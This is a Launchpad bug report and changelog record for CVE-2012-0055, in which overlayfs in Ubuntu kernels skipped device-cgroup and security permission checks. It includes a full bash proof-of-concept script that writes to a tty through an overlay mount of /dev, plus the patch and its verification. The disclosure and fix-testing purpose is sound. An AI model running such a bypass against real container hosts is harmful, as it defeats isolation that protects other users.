overlayfs does not honor lxc-related permissions

Bug #915941 reported by Gary Poster
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
linux (Ubuntu)
High
Andy Whitcroft
Oneiric
High
Andy Whitcroft
Precise
High
Andy Whitcroft
lxc (Ubuntu)
Undecided
Unassigned
Oneiric
Undecided
Unassigned
Precise
Undecided
Unassigned

Bug Description

Using overlayfs with lxc causes tty problems that can kill X. Overlayfs needs to honor the necessary cgroup permission calls, per the following information from Serge.

"""
here is a script which you can use to test the overlayfs
issue:

========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
 echo "couldn't find devices cgroup mountpoint"
 exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================

The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.

fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""

[This blocks resolution of bug 914169]

Gary Poster (gary)
Changed in launchpad:
status: New → Triaged
importance: Undecided → High
Dave Walker (davewalker)
Changed in lxc (Ubuntu):
importance: Undecided → Medium
Andy Whitcroft (apw)
affects: launchpad → linux
no longer affects: linux
Changed in linux (Ubuntu):
importance: Undecided → High
assignee: nobody → Andy Whitcroft (apw)
status: New → In Progress
Revision history for this message
Andy Whitcroft (apw) wrote :

Proposed patch for Precise

security vulnerability: no → yes
Andy Whitcroft (apw)
Changed in lxc (Ubuntu):
status: New → Invalid
Revision history for this message
Andy Whitcroft (apw) wrote :

I have built some Precise test kernels with the proposed fix applied. If you could test those and report any results here. Kernels can be found here:

    http://people.canonical.com/~apw/lp915941-precise/

Thanks.

tags: added: patch
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2012-0055

Revision history for this message
Andy Whitcroft (apw) wrote :

Patch for Oneiric

no longer affects: linux-ec2 (Ubuntu)
no longer affects: linux-lts-backport-maverick (Ubuntu)
no longer affects: linux-lts-backport-natty (Ubuntu)
no longer affects: linux-lts-backport-oneiric (Ubuntu)
no longer affects: linux-mvl-dove (Ubuntu)
Revision history for this message
Gary Poster (gary) wrote :

The 64 bit kernels that apw provided fixed the described issue for me. Thank you.

To test, I created a kvm image based on the Precise daily from Jan 17. I ran the script that triggered the problem initially and verified that the problem still happened (the visual effect being a corrupted screen). I then installed the provided 64 bit headers and image using dpkg, and restarted the kvm. Repeating the script, the problem did not occur.

Andy Whitcroft (apw)
Changed in linux (Ubuntu):
status: In Progress → Fix Committed
Changed in linux (Ubuntu Oneiric):
status: New → Fix Committed
importance: Undecided → High
assignee: nobody → Andy Whitcroft (apw)
Changed in lxc (Ubuntu Oneiric):
status: New → Invalid
Changed in lxc (Ubuntu Precise):
importance: Medium → Undecided
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package linux - 3.2.0-10.17

---------------
linux (3.2.0-10.17) precise; urgency=low

  [ Andy Whitcroft ]

  * Revert "SAUCE: overlayfs -- fs: limit filesystem stacking depth"
  * Revert "SAUCE: overlayfs -- overlay: overlay filesystem documentation"
  * Revert "SAUCE: overlayfs -- overlayfs: implement show_options"
  * Revert "SAUCE: overlayfs -- overlayfs: add statfs support"
  * Revert "SAUCE: overlayfs -- overlay filesystem"
  * Revert "SAUCE: overlayfs -- vfs: introduce clone_private_mount()"
  * Revert "SAUCE: overlayfs -- vfs: export do_splice_direct() to modules"
  * Revert "SAUCE: overlayfs -- vfs: add i_op->open()"
  * ensure debian/ is not excluded from git by default
  * add new scripting to handle buglinks in rebases
  * ubuntu: overlayfs -- overlayfs: add statfs support
  * ubuntu: overlayfs -- overlayfs: apply device cgroup and security
    permissions to overlay files
    - LP: #915941, #918212
    - CVE-2012-0055

  [ Erez Zadok ]

  * ubuntu: overlayfs -- overlayfs: implement show_options

  [ Leann Ogasawara ]

  * Revert "SAUCE: dmar: disable if ricoh multifunction detected"
  * [Config] Disable CONFIG_INTEL_IOMMU_DEFAULT_ON
    - LP: #907377, #911236
  * [Config] Enable CONFIG_IRQ_REMAP

  [ Miklos Szeredi ]

  * ubuntu: overlayfs -- vfs: pass struct path to __dentry_open()
  * ubuntu: overlayfs -- vfs: add i_op->open()
  * ubuntu: overlayfs -- vfs: export do_splice_direct() to modules
  * ubuntu: overlayfs -- vfs: introduce clone_private_mount()
  * ubuntu: overlayfs -- overlay filesystem
  * ubuntu: overlayfs -- fs: limit filesystem stacking depth

  [ Neil Brown ]

  * ubuntu: overlayfs -- overlay: overlay filesystem documentation

  [ Upstream Kernel Changes ]

  * (pre-stable) x86/PCI: amd: factor out MMCONFIG discovery
    - LP: #647043
  * (pre-stable) PNP: work around Dell 1536/1546 BIOS MMCONFIG bug that
    breaks USB
    - LP: #647043
 -- Leann Ogasawara <email address hidden> Mon, 16 Jan 2012 07:10:08 -0800

Changed in linux (Ubuntu Precise):
status: Fix Committed → Fix Released
Revision history for this message
Herton R. Krzesinski (herton) wrote :

This was assigned to CVE as well, security fixes are not subject to the standard verification process.

tags: added: verification-done-oneiric
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (14.0 KiB)

This bug was fixed in the package linux - 3.0.0-16.28

---------------
linux (3.0.0-16.28) oneiric-proposed; urgency=low

  [Herton R. Krzesinski]

  * Release Tracking Bug
    - LP: #922692

  [ Upstream Kernel Changes ]

  * Revert "drm/i915/dp: Fix the math in intel_dp_link_required"
    - LP: #919350

linux (3.0.0-16.27) oneiric-proposed; urgency=low

  [Brad Figg]

  * Release Tracking Bug
    - LP: #920735

  [ Paolo Pisati ]

  * Revert "SAUCE: omap3: beagle: if rev unknown, assume xM revision C"
    - LP: #912199
  * Revert "SAUCE: omap3: beagle: detect new xM revision C"
    - LP: #912199
  * Revert "SAUCE: omap3: beagle: detect new xM revision B"
    - LP: #912199
  * Revert "SAUCE: omap3: beaglexm: fix DVI initialization"
    - LP: #912199
  * [Config] DEFAULT_MMAP_MIN_ADDR=32k on arm
    - LP: #903346

  [ Upstream Kernel Changes ]

  * Revert "rtc: Disable the alarm in the hardware"
    - LP: #913373
  * Support for Terratec G1
    - LP: #821061
  * drm/radeon/kms: fix DP detect and EDID fetch for DP bridges
    - LP: #825777
  * drm/radeon/kms/DCE4.1: fix Select_CrtcSource EncodeMode setting for DP
    bridges (v2)
    - LP: #825777
  * drm/radeon/kms: cleanup atombios_adjust_pll()
    - LP: #825777
  * drm/radeon/kms/atom: rework encoder dpms
    - LP: #825777
  * drm/radeon/kms: check for DP MST mode in a few more places (v2)
    - LP: #825777
  * drm/radeon/kms: rework DP bridge checks
    - LP: #825777
  * drm/radeon/kms: fix DP setup on TRAVIS bridges
    - LP: #825777
  * ALSA: sis7019 - give slow codecs more time to reset
    - LP: #907778
  * ALSA: hda/realtek - Fix Oops in alc_mux_select()
    - LP: #907778
  * alarmtimers: Fix time comparison
    - LP: #907778
  * ARM: davinci: da850 evm: change audio edma event queue to EVENTQ_0
    - LP: #907778
  * arm: mx23: recognise stmp378x as mx23
    - LP: #907778
  * ARM: at91: fix clock conid for atmel_tcb.1 on 9260/9g20
    - LP: #907778
  * ARM: davinci: dm646x evm: wrong register used in
    setup_vpif_input_channel_mode
    - LP: #907778
  * ASoC: Provide a more complete DMA driver stub
    - LP: #907778
  * fs/proc/meminfo.c: fix compilation error
    - LP: #907778
  * thp: add compound tail page _mapcount when mapped
    - LP: #907778
  * thp: set compound tail page _count to zero
    - LP: #907778
  * ptp: Fix clock_getres() implementation
    - LP: #907778
  * mm: Ensure that pfn_valid() is called once per pageblock when reserving
    pageblocks
    - LP: #907778
  * mm: vmalloc: check for page allocation failure before vmlist insertion
    - LP: #907778
  * fix apparmor dereferencing potentially freed dentry, sanitize
    __d_path() API
    - LP: #907778
  * target: Handle 0 correctly in transport_get_sectors_6()
    - LP: #907778
  * intel-iommu: fix return value of iommu_unmap() API
    - LP: #907778
  * intel-iommu: set iommu_superpage on VM domains to lowest common
    denominator
    - LP: #907778
  * intel-iommu: fix superpage support in pfn_to_dma_pte()
    - LP: #907778
  * percpu: fix chunk range calculation
    - LP: #907778
  * iwlwifi: do not re-configure HT40 after associated
    - LP: #907778
  * mac80211: fix race condition caused by late addBA respon...

Changed in linux (Ubuntu Oneiric):
status: Fix Committed → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers